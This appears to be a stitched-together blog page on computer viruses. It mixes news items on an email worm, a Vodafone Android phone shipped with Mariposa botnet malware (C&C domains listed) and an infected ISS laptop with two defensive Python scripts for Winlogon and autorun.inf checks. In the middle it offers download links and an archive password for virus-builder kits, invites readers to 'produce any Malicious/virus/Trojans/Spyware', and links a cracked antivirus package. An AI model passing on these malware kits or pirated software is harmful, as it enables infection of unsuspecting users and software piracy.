IP

virusssssssssss

Email Worm Spreading Like Wildfire – W32.Imsolk.B@mm




A fast-moving email worm that began spreading on Thursday has been able to affect hundreds of thousands of computers worldwide, anti-virus provider Symantec warned.


The email arrives with the subject “Here you have.” An executable screensaver that’s disguised as a PDF document then tries to send the same message to everyone listed in the recipient’s address book. The .scr file is a variation of the W32.Imsolk.A@mm worm Symantec discovered last month.


In addition to spreading through email, it can propagate through mapped drives, autorun and instant messenger. It also has the ability to disable various security programs.


The worm is a throwback to attacks not seen in almost a decade, when the Anna Kournikova and I Love You attacks wreaked havoc on email systems worldwide. The Here You Go worm appears to be different in that the malicious payload is downloaded from a page on members.multimania.com, rather than being attached to the email. That could make efforts to eradicate the worm easier.


Then again, McAfee said multiple variants of the worm appear to be spreading, so it’s not yet clear that the malicious screensaver is hosted by a single source.


Source: The Register
More Info: New Round of Email Worm, “Here you have”

Vodafone Distributes Mariposa Botnet:

 

Here is yet another example of a company distributing malware to its userbase. Unfortunately it probably won’t be the last.
Today one of our colleagues received a brand new Vodafone HTC Magic with Google’s Android OS. “Neat” she said. Vodafone distributes this phone to its userbase in some European countries and it seems affordable as you can get it for 0€ or 1€ under certain conditions.
The interesting thing is that when she plugged the phone into her PC via USB her Panda Cloud Antivirus went off, detecting both an autorun.inf and autorun.exe as malicious. A quick look into the phone quickly revealed it was infected and spreading the infection to any and all PCs that the phone would be plugged into.
A quick analysis of the malware reveals that it is in fact a Mariposa bot client. This one, unlike the one announced last week which was run by Spanish hacker group “DDP Team”, is run by some guy named “tnls”, as the botnet-control mechanism shows:
00129953 |. 81F2 736C6E74 |XOR EDX,746E6C73 ; ”tnls”
The Command & Control servers which it connects to via UDP to receive instructions are:
mx5.nadnadzz2.info
mx5.channeltrb123trb.com
mx5.ka3ek2.com
Once infected you can see the malware “phoning home” to receive further instructions, probably to steal all of the user’s credentials and send them to the malware writer.
Interestingly enough, the Mariposa bot is not the only malware I found on the Vodafone HTC Magic phone. There’s also a Conficker and a Lineage password-stealing malware. I wonder who’s doing QA at Vodafone and HTC these days.
Source: Panda Research Blog

TeraBIT Virus Maker 2.8 SE:

TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)

Terabit Virusmaker
by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran

dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe

Tested on Windows XP
September 19, 2007
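
The startup change listed above can be checked for directly. The following is an added example, not part of the original listing: it audits a Winlogon "Shell" value and reports anything appended to or substituted for explorer.exe. The function names and the returned dictionary layout are assumptions made for this sketch.

```python
import ntpath
import re
import sys

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
EXPECTED_SHELL = "explorer.exe"  # the "Old data" value, compared case-insensitively

def shell_entries(shell_value):
    """Split a Shell value into entries; commas and whitespace both separate them.

    A path containing spaces is split into several entries, which is acceptable
    here because every entry other than explorer.exe is reported anyway.
    """
    parts = re.split(r"[,\s]+", shell_value.strip())
    return [p.strip('"') for p in parts if p.strip('"')]

def audit_shell(shell_value):
    """Flag any Shell value that is not exactly explorer.exe."""
    entries = shell_entries(shell_value)
    unexpected = [e for e in entries if e.lower() != EXPECTED_SHELL]
    return {
        "value": shell_value,
        "clean": [e.lower() for e in entries] == [EXPECTED_SHELL],
        "unexpected": unexpected,
        # Basenames are convenient to match against a list of known dropped files.
        "basenames": [ntpath.basename(e).lower() for e in unexpected],
    }

def read_winlogon_shell():
    """Read the live value from HKLM (Windows only)."""
    import winreg
    # Ask for the 64-bit registry view even when Python itself is 32-bit.
    access = winreg.KEY_READ | winreg.KEY_WOW64_64KEY
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY, 0, access) as key:
        value, _kind = winreg.QueryValueEx(key, "Shell")
    return value

# The "New data" string from the listing above, used when not run on Windows.
REPORTED_VALUE = r"explorer.exe C:\WINDOWS\system32\csmm.exe"

if __name__ == "__main__":
    value = read_winlogon_shell() if sys.platform == "win32" else REPORTED_VALUE
    print(audit_shell(value))
```
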

Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.html

Virus Maker Professional 2008

Scanned By Kaspersky Internet Security 325, Nothing Found

Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware
All Info inside rar
Download :
http://www.4shared.com/file/43506955/93326338/CreAtive_By_Dark_Man_2009.html
http://www.2shared.com/file/3115492/e3275d24/CreAtive_By_Dark_Man_2009.html
http://rapidshare.com/files/99661790…k_Man_2009.rar
Password : LoloUOwnRisk

ESET NOD32 Antivirus v3.0.672 Business Edition Full:

ESET NOD32 Antivirus System – Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance & smallest footprint.
NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.

Changes in version 3.0.672:
• Fixed problem causing instability on Microsoft Windows Vista 64-bit
• Fixed problem in anti spam module causing “Unexpected exception 003 and 007” error messages

Size: 19.6 MB
Download NOD32 Antivirus 3.0.672 Business :
http://rapidshare.com/files/147336388/ESET_NOD32_Antivirus_v3.0.672_Business_Edition_Full.rar


International Space Station Infected By Virus:

  NASA confirmed this week that a computer on the International Space Station is infected with a virus.

The malicious software is called W32.TGammima.AG, and technically it’s a worm.
The interesting point, other than how NASA could let this happen, is the way the worm spreads–on USB flash drives.
Malicious software spread by USB flash drives and other removable media takes advantage of a questionable design decision by Microsoft.
Windows is very happy to run a program automatically when a USB flash drive is inserted into a PC.
How convenient, both for end users and for bad guys.

Source : CNET
http://news.cnet.com/8301-13554_3-10027754-33.html
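
Both the Vodafone phone and the space station laptop were infected through the autorun mechanism on removable media. The following is an added example, not code from CNET, Panda or the original post: it reads a drive's autorun.inf without executing anything and lists the programs it would launch. The function names and the sample file contents are constructed for illustration.

```python
import os
import re
import tempfile

# [autorun] keys that make Windows start a program from the inserted media.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

def autorun_launch_commands(text):
    """Return (key, command) pairs from the [autorun] section of autorun.inf text."""
    section, found = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line and not line.startswith(";"):
            key, _, value = line.partition("=")
            if LAUNCH_KEY.match(key.strip()) and value.strip():
                found.append((key.strip().lower(), value.strip()))
        # Blank lines, comments and junk padding lines are skipped, not fatal.
    return found

def first_token(command):
    """Program part of a command line: a quoted path or the first token."""
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split()[0]

def scan_drive_root(root):
    """List what a drive's autorun.inf would launch and whether that file exists."""
    names = {n.lower(): n for n in os.listdir(root)}
    if "autorun.inf" not in names:
        return []
    with open(os.path.join(root, names["autorun.inf"]), "rb") as fh:
        data = fh.read()
    # Some autorun.inf files are UTF-16 with a BOM; everything else is read bytewise.
    text = data.decode("utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "latin-1")
    return [{"key": k, "command": c, "present": first_token(c).lower() in names}
            for k, c in autorun_launch_commands(text)]

# Constructed sample, not recovered from the infected phone or the ISS laptop.
SAMPLE_INF = ("[AutoRun]\r\n;padding\r\nopen=autorun.exe\r\nicon=folder.ico\r\n"
              "shell\\open\\command=autorun.exe\r\nlabel=Removable Disk\r\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "AUTORUN.INF"), "w", newline="") as fh:
            fh.write(SAMPLE_INF)
        open(os.path.join(root, "autorun.exe"), "wb").close()
        for finding in scan_drive_root(root):
            print(finding)
```

Pointing `scan_drive_root` at a mounted USB volume from an analysis host shows what the media is set up to run before it is ever plugged into a Windows machine with AutoRun enabled.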

          






